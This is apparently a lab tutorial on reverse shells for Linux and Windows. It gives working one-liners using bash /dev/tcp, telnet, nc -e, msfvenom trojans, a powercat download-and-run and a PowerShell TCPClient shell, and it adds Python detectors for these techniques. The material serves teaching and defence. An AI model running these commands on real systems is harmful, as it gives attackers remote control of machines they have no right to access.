0x00 Reverse shell overview
Reverse shell: we start a listener on a host we control (a VPS with a public IP), and then have the target server connect back to that host; the shell that arrives over this connection is used to control the server remotely.
0x01 Why a reverse shell is needed
Because of firewalls, insufficient privileges, the port already being in use, and similar reasons, it is often impossible to connect directly to the target host. In those cases a reverse shell is used, so that the target host itself actively connects out to our VPS on the public network.
0x02 Reverse shell under Linux
Lab environment:
Attack host: kali: 192.168.217.135
Target host: ubuntu: 192.168.217.132
1. Bash reverse shell
1) Listen on the attack host:
nc -lvp port // set the listening port
2) Run the reverse shell on the target host:
bash -i >& /dev/tcp/xxxx/port 0>&1
// bash -i: open an interactive bash
// >&: redirect standard output and standard error to the file /dev/tcp/..., i.e. send them to the remote end
// /dev/tcp/xxxx/port: a bash pseudo-device that opens a TCP socket connection, where xxxx is the IP to connect back to and port is the port
// 0>&1: redirect standard input to standard output, so that the remote end can interact with the returned shell
Linux file descriptors:
0 - standard input (stdin), redirected with < or <<
1 - standard output (stdout), redirected with > or >>
2 - standard error (stderr), redirected with 2> or 2>>
3) Back on the attack host, the shell has come back successfully
2. telnet reverse shell
On the attack host, listen on two ports (one for input, one for output):
nc -lvp 4444
nc -lvp 5555
Run on the target host:
telnet 192.168.217.135 4444 | /bin/bash | telnet 192.168.217.135 5555
// Two ports are listened on here and the pipe character chains the connections together: a pipe feeds the output of the command before it into the input of the command after it. So commands typed on the remote port 4444 become the input of the local /bin/bash, which executes them, and the results and errors of the local shell are sent to the remote port 5555.
After the shell has come back, execute commands in the terminal listening on port 4444; the results appear in the other terminal.
3. nc reverse shell
Listen on the attack host:
nc -lvp port
Run on the target host:
nc -e /bin/bash ip port // nc establishes a direct TCP session, and the target host's local bash is handed back to the connecting host over that session
// the -e parameter specifies the program to execute once the connection is established, here /bin/bash; this passes a local shell to the remote end, which then executes commands on the target remotely
If the target host's Linux distribution ships an nc without the -e parameter, use the following method instead:
nc ip port1 | /bin/bash | nc ip port2
Reverse shell succeeded
4. Using msfvenom
Search for related payloads with msfvenom on the attack host (python is used as the example here)
msfvenom -l payloads | grep 'cmd/unix/reverse'
Many ways of obtaining a reverse shell can be seen
Run the command:
msfvenom -p cmd/unix/reverse_python lhost=192.168.217.135 lport=6666
to obtain the corresponding payload
Then start an nc listener on the attack host
nc -lvp port
Execute the payload produced by msfvenom on the target host
Reverse shell succeeded
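From the defender's side, every Linux technique in this section leaves the same trace: a shell process whose file descriptors 0/1/2 point at a socket, or a command line that still carries the /dev/tcp, nc -e or telnet pipeline. The following check is an added example, not code from the original post; it reads the /proc/<pid>/fd symlinks on a live Linux host, and the SAMPLE records are constructed for the example rather than captured from a real machine.

```python
import os
import re

# Every Linux technique above ends with a shell whose fd 0/1/2 are a TCP socket
# (bash /dev/tcp, nc -e, the msfvenom python payload) or whose command line carries
# the redirection itself; the /proc/<pid>/fd/N symlinks expose the former.
SHELLS = {"bash", "sh", "dash", "zsh", "ash"}
# Fragments taken from the one-liners on this page; ordinary tooling does not use them.
SUSPICIOUS = re.compile(r"/dev/tcp/|\bnc\b[^|]*\s-e\s+/bin/|\btelnet\b[^|]*\|\s*/bin/(ba)?sh")


def classify(proc):
    """Return reasons a process record looks like a reverse shell ([] means clean).
    proc = {"comm": str, "cmdline": str, "fds": {0: str, 1: str, 2: str}}, each fds
    value being the readlink() target of /proc/<pid>/fd/<n>, e.g. "socket:[48211]"."""
    reasons = []
    fds = proc.get("fds", {})
    on_socket = [n for n in (0, 1, 2) if fds.get(n, "").startswith("socket:")]
    if proc["comm"] in SHELLS and on_socket:
        reasons.append(f"{proc['comm']} has fds {on_socket} on a socket")
    if SUSPICIOUS.search(proc.get("cmdline", "")):
        reasons.append("command line contains a reverse-shell redirection")
    return reasons


def scan_proc():
    """Walk the live /proc (Linux only; run as root for full coverage) -> {pid: reasons}."""
    hits = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
            fds = {n: os.readlink(f"/proc/{pid}/fd/{n}") for n in (0, 1, 2)}
        except OSError:
            continue  # process exited, or it is not ours to inspect
        reasons = classify({"comm": comm, "cmdline": cmdline, "fds": fds})
        if reasons:
            hits[int(pid)] = reasons
    return hits


# Constructed sample records: a normal login shell on a pty, the "bash -i" child of
# this page's /dev/tcp one-liner (stdio already on the socket), and an "nc -e" launch.
SAMPLE = [
    {"comm": "bash", "cmdline": "-bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    {"comm": "bash", "cmdline": "bash -i", "fds": {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}},
    {"comm": "nc", "cmdline": "nc -e /bin/bash 192.168.217.135 4444", "fds": {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}},
]
```

Run `classify()` over `SAMPLE` to see the two flagged records, or call `scan_proc()` on a Linux host to check real processes; a web server or python daemon with socket-backed stdio is not flagged because only shell binaries are checked.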
0x03 Reverse shell under Windows
Lab environment:
Attack host: kali: 192.168.217.135
Target host: Win7: 192.168.217.130
1. nc reverse shell
Listen on the attack host:
nc -lvp port
Run on the target host:
nc.exe -e cmd.exe 192.168.217.135 6666
Reverse shell succeeded
2. msfvenom reverse shell
On the attack host, search for windows x64 tcp payloads:
msfvenom -l payloads | grep windows | grep x64 | grep tcp
Here windows/x64/meterpreter/reverse_tcp is chosen to generate the trojan file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.217.135 lport=6666 -f exe >test.exe
Move the trojan file to the desktop so that it can be copied to the target host easily
Use msfconsole to listen on the attack host:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.217.135
set lport 6666
exploit
Execute the test.exe trojan file on the target host
The session can be seen coming back on the attack host
3. powershell reverse shell
Listen on the attack host:
nc -lvp port
On the target host:
1) Execute the command
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.217.135 -p 6666 -e cmd
Reverse shell succeeded
2) Reverse shell with a custom powershell function:
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.217.135',6666);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Reverse shell succeeded
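On the Windows side the three techniques in this section are best caught by correlating process creation, PowerShell script-block logging (event 4104, which records the decoded script even when the command line is encoded) and outbound network connections by the same process. The correlation below is an added example, not code from the original post; the event records are constructed in a simplified Sysmon-like JSON shape (keys id, pid, image, cmd, script, dst, dport are this example's own, not Sysmon's field names) and are not from a real host.

```python
import json
import re
from collections import defaultdict

SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "nc.exe", "nc64.exe"}
# Fragments of the PowerShell techniques on this page; 4104 script-block logging
# records the decoded script even when the command line only shows -enc <base64>.
SCRIPT_HINTS = [r"Net\.Sockets\.TCPClient", r"\.GetStream\(\)", r"\b(iex|Invoke-Expression)\b",
                r"DownloadString\(", r"\bpowercat\b", r"\s-(enc|encodedcommand)\b"]

def score_events(events):
    """Group Sysmon-style events by pid and return {pid: [reasons]} for suspicious ones.
    Event shapes (simplified): 1 ProcessCreate {image, cmd}, 3 NetworkConnect
    {image, dst, dport}, 4104 PowerShell script block {script}; all carry id and pid."""
    findings = defaultdict(list)
    connected = set()
    for ev in events:
        pid, text = ev["pid"], ev.get("cmd", "") + ev.get("script", "")
        exe = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        if ev["id"] == 3 and exe in SHELL_IMAGES:
            findings[pid].append(f"{exe} connected out to {ev['dst']}:{ev['dport']}")
            connected.add(pid)
        if ev["id"] == 1 and exe == "nc.exe" and re.search(r"\s-e\s+cmd(\.exe)?", ev.get("cmd", "")):
            findings[pid].append("nc.exe launched with -e cmd.exe")
        hits = [h for h in SCRIPT_HINTS if re.search(h, text, re.I)]
        if len(hits) >= 2:  # a single hint (e.g. iex alone) is common in admin scripts
            findings[pid].append(f"script matches {len(hits)} reverse-shell hints")
    # A suspicious launch that also produced an outbound socket is the strongest signal.
    for pid in list(findings):
        if pid in connected and len(findings[pid]) > 1:
            findings[pid].append("confirmed: suspicious launch followed by network connect")
    return dict(findings)

# Constructed sample events: the nc.exe -e cmd.exe launch, the TCPClient one-liner run
# as an encoded command (only the 4104 block shows its body), a benign PowerShell
# command, and an ordinary browser connection.
SAMPLE = [json.loads(line) for line in r'''
{"id": 1, "pid": 2044, "image": "C:\\Users\\bob\\Desktop\\nc.exe", "cmd": "nc.exe -e cmd.exe 192.168.217.135 6666"}
{"id": 3, "pid": 2044, "image": "C:\\Users\\bob\\Desktop\\nc.exe", "dst": "192.168.217.135", "dport": 6666}
{"id": 1, "pid": 2100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0A..."}
{"id": 4104, "pid": 2100, "script": "$client = New-Object Net.Sockets.TCPClient('192.168.217.135',6666);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)"}
{"id": 3, "pid": 2100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "dst": "192.168.217.135", "dport": 6666}
{"id": 1, "pid": 2210, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell -c Get-ChildItem C:\\Logs | Out-String"}
{"id": 3, "pid": 2300, "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "dst": "198.51.100.7", "dport": 443}
'''.strip().splitlines()]
```

`score_events(SAMPLE)` reports pids 2044 and 2100 as confirmed and stays silent on the benign Get-ChildItem and firefox events; powershell.exe making a connection on its own is only recorded as one reason, since legitimate scripts also use the network.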